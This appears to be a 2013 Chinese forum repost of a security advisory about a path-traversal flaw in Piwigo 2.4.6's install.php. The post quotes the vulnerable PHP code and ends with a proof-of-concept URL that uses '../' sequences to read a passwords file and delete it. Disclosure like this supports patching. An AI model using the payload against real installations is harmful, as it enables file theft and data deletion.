找回密码
 立即注册
查看: 3243|回复: 0
打印 上一主题 下一主题

Piwigo任意文件泄露和任意文件删除漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:15:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Piwigo是用PHP编写的相册脚本。; Q1 I& K9 G( T; O

1 Y  w: _6 c: G) l' w+ N9 ^+ BPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
7 Z6 e. I! q! \! q6 f====================================================================7 Y9 x9 [; t- x0 X, L+ L2 d
/install.php:
1 D" d+ X, z' j. k0 X  \, n0 [& U: C  ]-------------
. K8 D6 b, ]: o( A113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'])), m2 r0 E# y- K. z7 ^& Q9 Q, C. b
114: {1 }6 E1 |" J; q
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
: t- U$ W4 S4 @. q116:   header('Cache-Control: no-cache, must-revalidate');6 n# J, V1 ]- L/ g* t5 f
117:   header('Pragma: no-cache');; |; \* i  s+ y- X% M( \
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
2 G, d; O% x- C  g% S' g8 d5 L) ]119:   header('Content-Transfer-Encoding: binary');+ l- U: U+ k* b1 t4 {: B
120:   header('Content-Length: '.filesize($filename));
+ `8 L6 G" f: Y4 S: H9 A121:   echo file_get_contents($filename);& `/ D" N/ l+ r  G$ V# i0 |
122:   unlink($filename);
& m) V" ]' k3 w6 R( A3 E  A9 f) V; X123:   exit();
+ Z  d. }% ]8 R) A1 L124: }
  H' o4 E. k6 k* g/ O====================================================================
9 u* C/ x6 W  Q$ K9 C5 F ) g. Y! X% Q* h" |4 e; ^
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
9 G% ?0 M8 z$ V; M           Apache 2.4.2 (Win32)
8 A+ u; B: I$ ^4 ~' o7 |- |           PHP 5.4.42 f$ ^. v4 M8 h. P$ N
           MySQL 5.5.25a, H& ~; W! h, K0 p; W  j

* p& o, m& Z" j' }0 {Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
3 i( E7 h) f8 N& Z; V/ y                            @zeroscience( l/ r  _; `  d/ r; v+ X% v6 x( l5 \; x

$ T# e! S8 y  p9 n2 Z; [6 W( ZAdvisory ID: ZSL-2013-5127
& v$ Z. w( J2 V5 H7 VAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
' H" o+ f1 g7 {# g% L2 X9 @+ MVendor Patch: http://piwigo.org/bugs/view.php?id=2843. w0 P5 Y$ J" M, v

2 B! ~& a. y) A15.02.20139 w7 M, `8 ]; M

( o  r# n+ ]) w3 s$ F9 o--( q/ y# _" B! B. ~' j* A5 n1 w( B% ~
http://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt2 b) `& Q; a3 G% n) L* }

2 p0 q2 K" z2 b  L
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表